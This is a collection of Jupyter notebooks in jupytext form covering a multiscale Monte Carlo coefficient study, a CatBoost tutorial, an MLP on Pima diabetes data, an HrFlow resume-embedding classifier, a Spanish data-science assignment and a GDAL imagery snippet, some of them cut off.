# run the Monte Carlo study for 1% and 2% perturbation probabilities.
#background
bg = 0.05
#values
val = 1
random.seed(20)
#fine World
NWorldFine = np.array([256, 256])
NpFine = np.prod(NWorldFine+1)
#coarse World
NWorldCoarse = np.array([16,16])
NpCoarse = np.prod(NWorldCoarse+1)
#ratio between Fine and Coarse
NCoarseElement = NWorldFine/NWorldCoarse
boundaryConditions = np.array([[0, 0],
                               [0, 0]])
world = World(NWorldCoarse, NCoarseElement, boundaryConditions)
#righthandside
f = np.ones(NpCoarse)
#coefficient 2
# Vertical-channel coefficient pattern on the fine grid.
CoefClass = buildcoef2d.Coefficient2d(NWorldFine,
                        bg                  = bg,
                        val                 = val,
                        length              = 1,
                        thick               = 1,
                        space               = 2,
                        probfactor          = 1,
                        right               = 0,
                        down                = 0,
                        diagr1              = 0,
                        diagr2              = 0,
                        diagl1              = 0,
                        diagl2              = 0,
                        LenSwitch           = None,
                        thickSwitch         = None,
                        equidistant         = True,
                        ChannelHorizontal   = None,
                        ChannelVertical     = True,
                        BoundarySpace       = True)
A = CoefClass.BuildCoefficient()
ABase = A.flatten()
plt.figure("OriginalCoefficient")
drawCoefficient(NWorldFine, ABase)
plt.title('Original coefficient')
# Patch-size parameter for the localized correctors.
k = 4
###### precompute #######
NWorldFine = world.NWorldFine
NWorldCoarse = world.NWorldCoarse
NCoarseElement = world.NCoarseElement
boundaryConditions = world.boundaryConditions
NpFine = np.prod(NWorldFine+1)
NpCoarse = np.prod(NWorldCoarse+1)
#interpolant
IPatchGenerator = lambda i, N: interp.L2ProjectionPatchMatrix(i, N, NWorldCoarse, NCoarseElement, boundaryConditions)
#old Coefficient (need flatten form)
ABase = A.flatten()
Aold = coef.coefficientFine(NWorldCoarse, NCoarseElement, ABase)
pglod = pg_rand.VcPetrovGalerkinLOD(Aold, world, k, IPatchGenerator, 0)
pglod.originCorrectors(clearFineQuantities=False)
#Perturbations
# prob=100 means each entry vanishes with probability 1/100 (1%).
print '_____________ 1% Perturbations __________'
prob = 100
MC = 100
a, mum = result(pglod, world, CoefClass, A, f, MC, prob)
#Perturbations
print '_____________ 2% Perturbations __________'
prob = 50
MC = 100
a, mum = result(pglod, world, CoefClass, A, f, MC, prob)
|
notebooks/TEST_MonteCarlo_Coefficient_2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import catboost
import numpy as np
import pandas as pd
from sklearn.datasets import make_regression
# %pylab inline
# ### Example on generated data
# +
# Build a synthetic regression dataset with 10 numeric features (3 informative)
# and append two random categorical columns for CatBoost to consume.
n_features = 3
X, y = make_regression(n_samples=1000, n_features=10, n_informative=n_features, random_state=0)
plt.scatter(X[:, 0], X[:, 1], c=y)
X = pd.DataFrame(X)
X.columns = ['Column_{}'.format(i) for i in range(X.shape[1])]
cat_values_1 = ['A', 'B', 'C']
cat_values_2 = ['some', 'random', 'categorical', 'feature', 'values', 'testing']
# Uniformly sample a categorical value per row (np.random is unseeded here,
# so these columns differ between runs).
X.loc[:, 'CatColumn_1'] = [cat_values_1[np.random.randint(0, len(cat_values_1))] for _ in range(X.shape[0])]
X.loc[:, 'CatColumn_2'] = [cat_values_2[np.random.randint(0, len(cat_values_2))] for _ in range(X.shape[0])]
# -
X.sample(3)
# ### Train model and plot statistics
# Train a CatBoost regressor on the synthetic data and inspect per-feature
# statistics (calc_feature_statistics renders an interactive plot).
model = catboost.CatBoostRegressor(cat_features=['CatColumn_1', 'CatColumn_2'],
                                   one_hot_max_size=300, iterations=500)
model.fit(X, y, silent=True)
# #### Float feature
feature_num = 'Column_3'
res = model.calc_feature_statistics(X, y, feature_num, plot=True)
# #### One-Hot feature
feature_num = 'CatColumn_2'
res = model.calc_feature_statistics(X, y, feature_num, cat_feature_values=cat_values_2, plot=True)
# ### Test on Titanic dataset
# +
from catboost.datasets import titanic
titanic_train, titanic_test = titanic()
titanic_train_target = titanic_train.Survived
# Drop identifiers and columns not used as model features.
titanic_train.drop(['PassengerId', 'Survived', 'Name', 'Parch', 'Ticket', 'Cabin', 'Embarked'], axis=1, inplace=True)
titanic_train.head(3)
# -
# Binary classifier on the remaining Titanic columns.
titanic_model = catboost.CatBoostClassifier(
    iterations=200,
    cat_features=['Pclass', 'Sex', 'SibSp'],
    one_hot_max_size=10)
titanic_model.fit(titanic_train, titanic_train_target, silent=True)
titanic_train.dtypes
# #### Float feature
feature = 'Fare'
res = titanic_model.calc_feature_statistics(titanic_train, titanic_train_target, feature, plot=True)
# #### One-hot feature
feature = 'Sex'
res = titanic_model.calc_feature_statistics(titanic_train, titanic_train_target, feature, plot=True)
|
catboost/tutorials/model_analysis/feature_statistics_tutorial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import MLP_v5
from sklearn.model_selection import train_test_split
from keras.utils import to_categorical
# Load the PIMA Indians diabetes dataset: 8 feature columns + 1 binary label.
data = np.genfromtxt('PIMA_Indian.csv', delimiter = ',')
# Vectorized slicing replaces the per-element copy loops and no longer
# hard-codes 768 rows, so this works for any number of samples.
features = data[:, :8].astype(np.float32)
# Keep the (n, 1) shape the original loop produced.
labels = data[:, 8:9].astype(np.float32)
# One-hot encode the binary label -> shape (n, 2).
labels = to_categorical(labels, num_classes = 2)
# 80/20 train/test split with a fixed seed for reproducibility.
train_x, test_x, train_y, test_y = train_test_split(features, labels, test_size = 0.2, random_state = 42)
print('Train images shape = '+str(train_x.shape))
print('Train labels shape = '+str(train_y.shape))
print('Test images shape = '+str(test_x.shape))
# Fixed label: this line previously printed "Test images shape" twice.
print('Test labels shape = '+str(test_y.shape))
# Train a 2-class MLP for 10000 iterations, then evaluate on the held-out set.
_, weights = MLP_v5.Dense(2, train_x, train_y, 10000)
MLP_v5.evaluate(test_x, test_y, weights)
|
MLP_v5 with Pima Indian Dataset.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="AZdfdAQSt7hZ"
# ##### Copyright 2020 HrFlow's AI Research Department
#
# Licensed under the Apache License, Version 2.0 (the "License");
# + id="QNgz5iA-uD4E"
# Copyright 2020 HrFlow's AI Research Department. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# + [markdown] id="ijYNoliXuIKP"
# <p>
# <table align="left"><td>
# <a target="_blank" href="https://colab.research.google.com/github/Riminder/python-hrflow-api/blob/master/examples/colab/build_personalized_ai_hr_models.ipynb">
# <img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab
# </a>
# </td><td>
# <a target="_blank" href="https://github.com/Riminder/python-hrflow-api/blob/master/examples/colab/build_personalized_ai_hr_models.ipynb">
# <img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td><td>
# <a target="_blank" href="https://www.hrflow.ai/book-us">
# <img width=32px src="https://gblobscdn.gitbook.com/spaces%2F-M1L6Hspq8r9LXd5_gIC%2Favatar-1586188377926.png?generation=1586188378327930&alt=media" />Get an account</a>
# </td></table>
# <br>
# </p>
# + [markdown] id="FtpcP2wIAu_K"
# <p>
# <table align="center">
# <td>
# <a target="_blank" href="https://developers.hrflow.ai/ai-layers/embedding">
# <img width=800px img src="https://lh3.googleusercontent.com/JXagdsThZxaEKwjE83-QrJXjB1r1tk2-KmdBzb94X_a238-5bNtwHuDi-PUA4_cVBkpaCie1uil6lPDNhdggpZhkgiZBYQGe4iKRRGo13XvyYgzuG9Vw_fv72LiYrg2am9MIrPnkwlQ"/>
# </a>
# </td>
# </table>
# </p>
# + [markdown] id="PfFOG5klschh"
# Advantages of HrFlow.ai Embedding API:
#
# - **Save 90% of R&D time** spent on features engineering
#
# - Train with **limited amount of labels**
#
# - Increase inference **speed up to 26x**
#
# - **Limit the memory** footprint on production up to **300x**
# + [markdown] id="GuxYCkCJuYD7"
# # Getting Started
# This section sets up the environment to get access to **HrFlow Profile API** and sets up a connection to HrFlow.
# + id="KyHzNdpwuYnz"
# Machine Learning and Classification Libs
# !pip install --quiet tensorflow
# !pip install --quiet matplotlib
# !pip install --quiet pandas
# !pip install --quiet seaborn
# !pip install --quiet plotly
# !pip install --quiet tqdm
# HrFlow Dependencies
# !pip install --quiet python-magic
# !pip install --quiet hrflow
# + [markdown] id="8T8m_Vraucti"
# An **API Key** is required here. You can get your API Key at **https://```<your-sub domain/>```.hrflow.ai/settings/api/keys** or ask us for a **demo API Key**.
# + id="lZOVElmBudpi"
# Prompt for HrFlow credentials (hidden input) and open an API client,
# then mount Google Drive so the dataset folders are reachable.
import pprint
from hrflow import Hrflow
from getpass import getpass
# Credentials
api_secret = getpass(prompt="Please Enter Your API Secret Key")
client = Hrflow(api_secret=api_secret)
# Hrflow Synchronous Source
source_key = getpass(prompt="Please Enter a Synchronous source_key")
# + id="xMrGTO1pwvGN"
import os
import pickle
from google.colab import drive
drive.mount('/content/drive', force_remount=True)
# + [markdown] id="pbHmEEbGukre"
# # 1. Building Dataset
#
# Dataset Folders Tree Structure:
# - webinar/dataset/
# - resume/
# - data_scientist/
# - executive_manager/
# - profile/
# - data_scientist/
# - executive_manager/
# - embedding/
# - data_scientist/
# - executive_manager/
# + [markdown] id="1lE9oxNVuu6n"
# ## 1.1. Setting Dataset Root
# + id="9Fnx5BVP8rQ5"
def build_path(path):
    """Create *path* and any missing parent directories (no-op if it exists).

    os.makedirs replaces the manual split-on-"/"/mkdir walk, which also broke
    on absolute paths (the leading "/" produced an empty first component and
    an `os.mkdir("")` call).
    """
    os.makedirs(path, exist_ok=True)
# + id="YCzltHHNumh5"
import os
# Dataset Root Folder
DATASET_ROOT = "drive/My Drive/webinar/dataset"
# Resume Folder
# NOTE(review): the resume folders are only referenced, never created with
# build_path — they are expected to already exist with the input PDFs.
data_scientist_resume_folder = os.path.join(DATASET_ROOT, "resume", "data_scientist")
executive_manager_resume_folder = os.path.join(DATASET_ROOT, "resume", "executive_manager")
# Parsing Folder
data_scientist_parsing_folder = os.path.join(DATASET_ROOT, "parsing", "data_scientist")
executive_manager_parsing_folder = os.path.join(DATASET_ROOT, "parsing", "executive_manager")
build_path(data_scientist_parsing_folder)
build_path(executive_manager_parsing_folder)
# Profile Folder
data_scientist_profile_folder = os.path.join(DATASET_ROOT, "profile", "data_scientist")
executive_manager_profile_folder = os.path.join(DATASET_ROOT, "profile", "executive_manager")
build_path(data_scientist_profile_folder)
build_path(executive_manager_profile_folder)
# Embedding Folder
data_scientist_embedding_folder = os.path.join(DATASET_ROOT, "embedding", "data_scientist")
executive_manager_embedding_folder = os.path.join(DATASET_ROOT, "embedding", "executive_manager")
build_path(data_scientist_embedding_folder)
build_path(executive_manager_embedding_folder)
# + id="hGM0JvnuxneB"
print(os.listdir(data_scientist_resume_folder))
# + [markdown] id="L5nKOIeBu22o"
# ## 1.2. Parsing Resumes
# + id="TLKLexusutvt"
import json
from tqdm import tqdm
# Send every resume file to the HrFlow parsing API (synchronous mode) and
# store the JSON parsing result next to it, keyed by the file's base name.
for folder, target_folder in [(data_scientist_resume_folder, data_scientist_parsing_folder), (executive_manager_resume_folder, executive_manager_parsing_folder)]:
    file_names = os.listdir(folder)
    for file_name in tqdm(file_names):
        # Sending File for Parsing
        file_path = os.path.join(folder, file_name)
        with open(file_path, "rb") as file:
            profile = file.read()
        response = client.profile.parsing.add_file(source_key=source_key,
                                                   profile_file=profile,
                                                   sync_parsing=1)
        profile_parsing = response.get("data").get("parsing")
        # Saving Parsed Result
        # Base name without extension, e.g. "cv1.pdf" -> "cv1".
        target_path = os.path.join(target_folder, file_name.split(".")[0])
        with open(target_path,"w") as file:
            json.dump(profile_parsing, file)
# + [markdown] id="4dP6unj4u5Sh"
# ## 1.3. Downloading Profiles
# + id="QFKiftDVu8SZ"
import json
from tqdm import tqdm
# For each parsed resume, fetch the fully indexed profile from HrFlow (via the
# profile key stored in the parsing result) and save it as JSON.
for folder, target_folder in [(data_scientist_parsing_folder, data_scientist_profile_folder), (executive_manager_parsing_folder, executive_manager_profile_folder)]:
    file_names = os.listdir(folder)
    for file_name in tqdm(file_names):
        # Loading Parsing to get Profile Key
        file_path = os.path.join(folder, file_name)
        with open(file_path, "r") as file:
            profile = json.load(file)
        response = client.profile.indexing.get(source_key=source_key,
                                               key=profile["key"])
        profile = response.get("data")
        # Saving Indexed Result
        target_path = os.path.join(target_folder, file_name.split(".")[0])
        with open(target_path,"w") as file:
            json.dump(profile, file)
# + [markdown] id="9McHfesIu948"
# ## 1.4. Computing Embeddings
# + id="1CoGYabIu_wZ"
import base64
import numpy as np
def decode_embedding(base64_string, dim=1024):
    """Decode a base64-encoded HrFlow embedding into a float32 array.

    Args:
        base64_string: base64 text (str or bytes) holding big-endian
            float32 values, as returned by the HrFlow embedding API.
        dim: size of the trailing (feature) axis; defaults to 1024, the
            dimensionality used elsewhere in this notebook.

    Returns:
        np.ndarray of shape (n, dim), where n is inferred from the payload.
    """
    raw = base64.b64decode(base64_string)
    # '>f4' = big-endian 32-bit float, the wire format of the API payload.
    values = np.frombuffer(raw, dtype=np.dtype('>f4'))
    return np.reshape(values, (-1, dim))
# + id="1fkzVghhvqQ1"
import pickle
from tqdm import tqdm
# Compute an embedding for every stored profile (one sub-folder per job
# category) and cache it on disk as a pickle, keyed by the file's base name.
# The dead pre-loop assignments of folder/target_folder/file_names (they were
# immediately overwritten by the loop below) have been removed.
for folder, target_folder in [(data_scientist_profile_folder, data_scientist_embedding_folder), (executive_manager_profile_folder, executive_manager_embedding_folder)]:
    file_names = os.listdir(folder)
    for file_name in tqdm(file_names):
        # Loading Profile
        file_path = os.path.join(folder, file_name)
        with open(file_path, "r") as file:
            profile = json.load(file)
        response = client.document.embedding.post("profile",
                                                  profile,
                                                  return_sequences=True)
        profile_embedding = decode_embedding(response.get("data"))
        # Saving Embedded Result
        target_path = os.path.join(target_folder, file_name.split(".")[0])
        with open(target_path,"wb") as file:
            pickle.dump(profile_embedding, file)
# + [markdown] id="hGT06v1LvBb0"
# ## 1.5. Dataset Generator
# + id="brX1peuMwA9h"
import pickle
import tensorflow as tf
import numpy as np
class Generator(tf.keras.utils.Sequence):
    """Keras sequence that streams pickled profile embeddings in padded batches.

    Each item yields (profiles, labels): profiles is a (batch, pad_length,
    1024)-shaped tensor where every embedding is zero-padded to the longest
    sequence in the batch.
    """

    def __init__(self, file_paths, labels, batch_size=2):
        self.file_paths = file_paths
        self.labels = labels
        self.batch_size = batch_size
        self.indices = np.arange(len(file_paths))

    def __len__(self):
        # Number of full batches per epoch (remainder samples are dropped).
        return len(self.file_paths) // self.batch_size

    def on_epoch_end(self):
        # Reshuffle the sample order between epochs.
        np.random.shuffle(self.indices)

    def __getitem__(self, index):
        lo = index * self.batch_size
        hi = min(lo + self.batch_size, len(self.file_paths))
        chosen = self.indices[lo:hi]
        labels_batch = tf.constant(self.labels[chosen])
        # Load the pickled embeddings selected for this batch.
        profiles = []
        for path in self.file_paths[chosen]:
            with open(path, "rb") as handle:
                profiles.append(pickle.load(handle))
        # Zero-pad every sequence to the longest one in the batch.
        longest = max(item.shape[0] for item in profiles)
        padded = [tf.pad(item, [[0, longest - item.shape[0]], [0, 0]])
                  for item in profiles]
        return tf.stack(padded), labels_batch
# + id="U-CPtv6pwClg"
# Collect every cached embedding path and assign labels:
# 0 = data scientist, 1 = executive manager.
data_scientist_paths = [os.path.join(data_scientist_embedding_folder, file) for file in os.listdir(data_scientist_embedding_folder)]
executive_manager_paths = [os.path.join(executive_manager_embedding_folder, file) for file in os.listdir(executive_manager_embedding_folder)]
file_paths = np.array(data_scientist_paths + executive_manager_paths)
labels = np.array([0] * len(data_scientist_paths) + [1] * len(executive_manager_paths))
# + id="maGFlSBYwDs8"
# Smoke-test: pull one batch and print its shape.
generator = Generator(file_paths, labels)
x, y = next(iter(generator))
print(x.shape)
# + [markdown] id="YMX9bwWgwFRQ"
# # 2. Machine Learning With HrFlow.ai Embeddings
# + [markdown] id="RK03wDfAwJpN"
# ## 2.1. Profile Classification and Embedding
# + id="LiH5YD8KwGsx"
import tensorflow as tf
from tensorflow.keras.layers import Input, Masking, LSTM, Bidirectional, Dense, Dropout
from tensorflow.keras.models import Model
from tensorflow.keras.losses import SparseCategoricalCrossentropy
# Profile Encoder Deduced From Classification Model Training
# Encoder: (batch, timesteps, 1024) HrFlow embeddings -> 2-D profile vector.
# Masking skips zero-padded timesteps produced by the Generator.
model_input = Input(shape=(None, 1024), name="hrflow_embedding")
masking = Masking(name="masking")(model_input)
bi_lstm = Bidirectional(LSTM(8), name="bi_lstm")(masking)
dense = Dense(2, activation="tanh", name="dense")(bi_lstm)
profile_encoder = Model(inputs=[model_input], outputs=[dense], name="profile_encoder")
# Scoring from Encoded Profile
# Head: 2-D encoded profile -> softmax over the two job categories.
scoring_input = Input(shape=(2,))
dropout = Dropout(0.2, name="dropout")(scoring_input)
softmax = Dense(2, activation='softmax', name="softmax")(dropout)
scoring = Model(inputs=[scoring_input], outputs=[softmax], name="profile_scoring")
# Classification Model
# End-to-end model = encoder composed with the scoring head.
profile_embedding = profile_encoder(model_input)
profile_score = scoring(profile_embedding)
model = Model(inputs=[model_input], outputs=[profile_score])
model.compile(loss=SparseCategoricalCrossentropy(),
              optimizer='nadam',
              metrics=['accuracy'])
model.summary()
# + [markdown] id="ih2qiDzNwMSZ"
# ## 2.2. Training
# + id="Nw42Mj3TwN39"
model.fit(generator, epochs=5)
# + [markdown] id="LL-VyCl1wQov"
# ## 2.3. Embeddings and Predictions
# + id="_pb6NEv0wZyL"
def line_jump(text, every_char=50):
    """Insert HTML line breaks into *text* every *every_char* characters.

    Used to wrap long profile summaries for plotly hover tooltips.
    Fixed: the previous implementation dropped any trailing characters after
    the last full chunk (e.g. the final 20 chars of a 120-char string).
    """
    chunks = [text[i:i + every_char] for i in range(0, len(text), every_char)]
    return '<br />'.join(chunks)
# + id="atp5-4Y8wacS"
import pickle
import json
from pandas.core.frame import DataFrame
# Build a results table: per profile, its 2-D encoder output (x, y), its
# class-1 score and hard prediction, its true label, and its wrapped summary.
results = {"text": [], "x": [], "y": [], "score": [], "label": [], "prediction": []}
for file_path, label in zip(file_paths, labels):
    # Get Profile Label
    results["label"].append(label)
    # Get Profile Embedding
    with open(file_path, "rb") as file:
        hrflow_embedding = pickle.load(file)
    profile_embedding = profile_encoder.predict(np.expand_dims(hrflow_embedding, axis=0))[0]
    x, y = profile_embedding
    results["x"].append(x)
    results["y"].append(y)
    # Get Profile Prediction
    profile_score = model.predict(np.expand_dims(hrflow_embedding, axis=0))[0]
    results["score"].append(profile_score[1])
    results["prediction"].append(int(profile_score[1]>0.5))
    # Get Profile Summary
    # Map the embedding path to the matching profile JSON: the paths differ
    # only in the third-from-last component ("embedding" vs "profile").
    path = file_path.split("/")
    path[-3] = "profile"
    with open("/".join(path), "r") as file:
        summary = json.load(file)["info"]["summary"]
    results["text"].append(line_jump(summary))
df = DataFrame(results)
df
# + id="HdNbalRMwfsg"
import numpy as np
import plotly.graph_objects as go
import plotly.express as px
# Compute Scores for Mesh Values
# Evaluate the scoring head on a 2-D grid over the encoder's output space.
xx = np.arange(-1, 1.1, 0.1)
yy = np.arange(-1, 1.1, 0.1)
mesh_values = np.array([scoring.predict(np.array([[x, y] for x in xx]))[:,1] for y in yy])
# Contour/Boundary Plot
data = go.Contour(x=xx, y=yy, z=mesh_values,
                  colorscale=[[0.0, "rgb(165,0,38)"],
                              [0.1111111111111111, "rgb(215,48,39)"],
                              [0.2222222222222222, "rgb(244,109,67)"],
                              [0.3333333333333333, "rgb(253,174,97)"],
                              [0.4444444444444444, "rgb(254,224,144)"],
                              [0.5555555555555556, "rgb(224,243,248)"],
                              [0.6666666666666666, "rgb(171,217,233)"],
                              [0.7777777777777778, "rgb(116,173,209)"],
                              [0.8888888888888888, "rgb(69,117,180)"],
                              [1.0, "rgb(49,54,149)"]])
layout = {'width': 600, 'height': 600,
          'xaxis_title': 'x', 'yaxis_title': 'y',
          'xaxis': {'range': [-1, 1]}, 'yaxis': {'range': [-1, 1]},
          'title': 'Decision Boundaries (Executive Managers in Yellow, Data Scientists in Blue)'}
fig = go.Figure(data = data, layout=layout)
# Profiles Embeddings
# Fixed: df has no 'summary' column — the wrapped summary text lives in the
# 'text' column, so hover_data must reference 'text' or px.scatter raises.
scatter = px.scatter(df, x='x', y='y',
                     hover_data=['text', 'score', 'label', 'prediction'],
                     color='prediction')
fig.add_trace(scatter.data[0])
# Show Graph
fig.show()
|
examples/colab/build_personalized_ai_hr_models.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/DiploDatos/AnalisisyVisualizacion/blob/master/Entregable_Parte_1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="LYvAOR2VzHmW"
#
# **Diplomatura en Ciencia de Datos, Aprendizaje Automático y sus Aplicaciones**
#
# **Edición 2021**
#
# ---
# ## Trabajo práctico entregable - Parte 1
# + id="Xwdfo7z20TUK"
import io
import matplotlib
import matplotlib.pyplot as plt
import numpy
import pandas as pd
import seaborn
seaborn.set_context('talk')
# + id="Xwdfo7z20TUK"
# -
nuevas
# + [markdown] id="XY2Hl-Ma07Nn"
# ## Lectura del dataset
#
# En la notebook 00 se explican los detalles de la siguiente sección.
# -
# + id="Vviv_sqXdR5W"
# Load the preprocessed sysarmy 2020 salary survey and preview the first rows.
url = 'https://cs.famaf.unc.edu.ar/~mteruel/datasets/diplodatos/sysarmy_survey_2020_processed.csv'
df = pd.read_csv(url)
# + colab={"base_uri": "https://localhost:8080/", "height": 297} id="gckNHXXLktJ4" outputId="66c64637-de04-4239-a158-ce88d604511d"
df[:3]
# + [markdown] id="-ZSQYANFHHgV"
# # Ejercicio 1 - Análisis descriptivo
#
# Responder a la pregunta: **¿Cuáles son los lenguajes de programación asociados a los mejores salarios?**
#
# Para ello:
# 1. Seleccionar las columnas relevantes para analizar.
# 2. Seleccionar las filas relevantes para analizar. Esto incluye la eliminación de valores extremos y erróneos, pero también puede enfocar el análisis en una sub-población. Por ejemplo, se pueden limitar a personas con un salario mayor que 10000 pesos, o a las personas que trabajan sólo en "Data Science", pero deben justificar su elección y reformular la pregunta inicial de ser necesario.
# * Obtener una lista de los lenguajes de programación más populares. Decidir cuántos y cuáles seleccionan para incluir en el análisis.
# * Para cada una de las otras columnas del punto anterior, elegir los rangos o valores seleccionan para incluir en el análisis.
# 3. Seleccionar métricas que ayuden a responder la pregunta, y los métodos para analizarlas. Elegir UNA de las siguientes opciones:
# * Comparar las distribuciones de salario para cada lenguaje utilizando visualizaciones. Como la visualización es el producto final, debe ser clara y mostrar información relevante.
# * Comparar medidas de estadística descriptiva sobre la distribución de salario para cada lenguaje. Sean creativos, la estadística descriptiva nos permite decir cosas como: "el 10% de los mejores sueldos los ganan, en su mayoría, programadores que saben kotlin!" (donde *mayoría* es un término medio engañoso que sólo significa más del 50%). Para comparar múltiples lenguajes, les recomendamos usar también visualizaciones.
# * Comparar probabilidades. Por ejemplo: "Si sabés Python o Java, tenés un 30% más de chances de ganar arriba de 100K".
#
# Si lo consideran necesario, realicen varias iteraciones. Es decir, si encuentran que las distribuciones de los lenguajes de programación que seleccionaron inicialmente no son muy diferentes, pueden re-hacer el análisis usando sólo los lenguajes de programación que son diferentes.
# -
# + id="6dqTEr7cZgvl"
# complete here if you want to include more columns
# Columns kept for the language-vs-salary analysis below.
relevant_columns = ['tools_programming_languages', 'salary_monthly_NETO']
# + [markdown] id="OoGgzMvuEocM"
# ### Conteo de frecuencias de los lenguajes de programación
#
# La columna que contiene información sobre los lenguajes de programación utilizados es `tools_programming_languages`. Sus valores son strings con los lenguajes seleccionados separados por comas.
#
#
# + colab={"base_uri": "https://localhost:8080/"} id="J7AB2Ty8SvNl" outputId="cb0ee28d-5c7f-4ed5-cf32-f4fddce64eb7"
df.tools_programming_languages[:3]
# + [markdown] id="l8bYmvMhSroH"
# Las siguientes celdas de código separan estos lenguajes de programación y cuentan la frecuencia con la que aparecen.
#
# No es necesario entender este código en profundidad, aunque sí es un buen ejercicio.
# + colab={"base_uri": "https://localhost:8080/", "height": 223} id="PAQ81x3iUP_N" outputId="690186ea-5c29-4fb8-b06c-2ff8c3de7c71"
# Convert the comma-separated string of languages to a list of string.
# Remove 'ninguno de los anteriores' option, spaces and training commas.
def split_languages(languages_str):
    """Normalize a comma-separated language string into a list of tokens.

    Non-string inputs (e.g. NaN from pandas) yield an empty list.
    The text is lowercased, the 'ninguno de los anteriores' option is
    removed, and each whitespace-separated token is stripped of commas.
    """
    if not isinstance(languages_str, str):
        return []
    # Drop the "none of the above" option before tokenizing.
    cleaned = languages_str.lower().replace('ninguno de los anteriores', '')
    tokens = []
    for raw_token in cleaned.split():
        tokens.append(raw_token.strip().replace(',', ''))
    return tokens
# Create a new column with the list of languages
df.loc[:, 'cured_programming_languages'] = df.tools_programming_languages\
    .apply(split_languages)
# Make sure the new column survives the projection below.
if 'cured_programming_languages' not in relevant_columns:
    relevant_columns.append('cured_programming_languages')
# Duplicate each row of df for each programming language
# mentioned in the response.
# We only include in df_lang the columns we are going to analyze later, so we
# don't duplicate unnecessary information.
# apply(pd.Series).stack() expands each per-row language list into one row
# per (response, language) pair; the join brings back the analysis columns.
df_lang = df.cured_programming_languages\
    .apply(pd.Series).stack()\
    .reset_index(level=-1, drop=True).to_frame()\
    .join(df[relevant_columns])\
    .rename(columns={0: 'programming_language'})
# Horrible programming style! But a lot of data science code can be written
# as concatenations of functions (pipelines), and there's no elegant way of
# doing that on Python.
df_lang[:5]
# + [markdown] id="qm8NUg-7UEue"
# En la columna `programming_language` se encuentra cada lenguaje por separado. Notar que si una respuesta contenía 3 lenguajes, como `"HTML, Javascript, Python"`, la fila ha sido replicada 3 veces. Por ello, hay tres filas con índice 1.
# + colab={"base_uri": "https://localhost:8080/", "height": 357} id="lNPb4tTvWCwv" outputId="02efa4bd-7d00-49c1-efee-d5d68f3eaf9f"
# Frequency table: how many survey responses mention each language.
language_count = df_lang.programming_language.value_counts()\
    .reset_index()\
    .rename(columns={'index': 'language', 'programming_language': 'frequency'})
language_count[:10]
# + [markdown] id="nThbJ1KeUgDo"
# ## Filtrado de lenguajes relevantes
#
# El siguiente código permite seleccionar sólo las filas donde el valor de la columna `programming_language` se encuentre en la lista `interesting_languages`.
# + colab={"base_uri": "https://localhost:8080/", "height": 223} id="DEpVptnLZUQU" outputId="dc2bdb53-1fe2-4f1d-b5ba-42a53efe6d4c"
# Filter out languages that we want to exclude
# Complete here with your selected list.
# Keep only rows whose language appears in `interesting_languages`.
interesting_languages = ["Python"]
filtered_df_lang = df_lang[df_lang.programming_language.isin(interesting_languages)]
filtered_df_lang[:5]
# + [markdown] id="tWo8SmmC9FAk"
# # Ejercicio 2 - Densidades y varias variables
#
# Responder a la pregunta general: **¿Qué herramientas (prácticas y teóricas) son útiles para explorar la base, descubrir patrones, asociaciones?**
#
# Para ello considere (igual al ejercicio Anterior):
# 1. Seleccionar las columnas relevantes para analizar.
# 2. Seleccionar las filas relevantes para analizar. Esto incluye la eliminación de valores extremos y erróneos, pero también puede enfocar el análisis en sub-poblaciones.
# + [markdown] id="5baYhH0XHM3S"
# ## a) Densidad conjunta
#
# ¿Qué herramientas visuales y modelos puede utilizar para estudiar la distribución y el comportamiento de sus datos?
#
# Elija tres variables numéricas y 2 variables categóricas. Visualice la base según varias de las variables elegidas. ¿Puede describir de alguna forma el comportamiento de sus datos? ¿Qué herramientas utilizaría? Describa
#
#
#
# + [markdown] id="lkuHE2aZGHMO"
# ## b) Asociación
#
# * Necesitamos decidir si sacar o no la columna de salario bruto. Para hacer la encuesta más simple.
# ¿Existe una correlación entre el salario bruto y el neto? Que abordaje y medidas usaría
#
#
# + [markdown] id="7MZrbRJCm-ae"
# ## c) Densidad condicional
#
# Estudie la distribución del salario según el nivel de estudio.
#
# Separe la población según el nivel de estudio (elija dos subpoblaciones numerosas) y grafique de manera comparativa ambos histogramas de la variable `'salary_monthly_NETO'`
# ¿Considera que ambas variables son independientes?
# ¿Qué analizaría al respecto?
#
# Calcule medidas de centralización y dispersión para cada subpoblación
#
#
#
#
#
# + [markdown] id="u8wgYxNiqVpE"
# ## d) Densidad Conjunta condicional
#
# Elija dos variables numéricas y una categórica.
# Estudie la dispersión (scatterplot) de las dos variables discriminando en color por la variable categórica (ayuda: hue en seaborn)
#
|
Entregable_Parte_1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
# ### Zhiqi: I renamed your file to zhiqi.tif:
# !ls imagery/zhiqi -l
# !gdalinfo -stats imagery/zhiqi/zhiqi.tif
# ### Here is an RGB plot of bands 3,4,5:
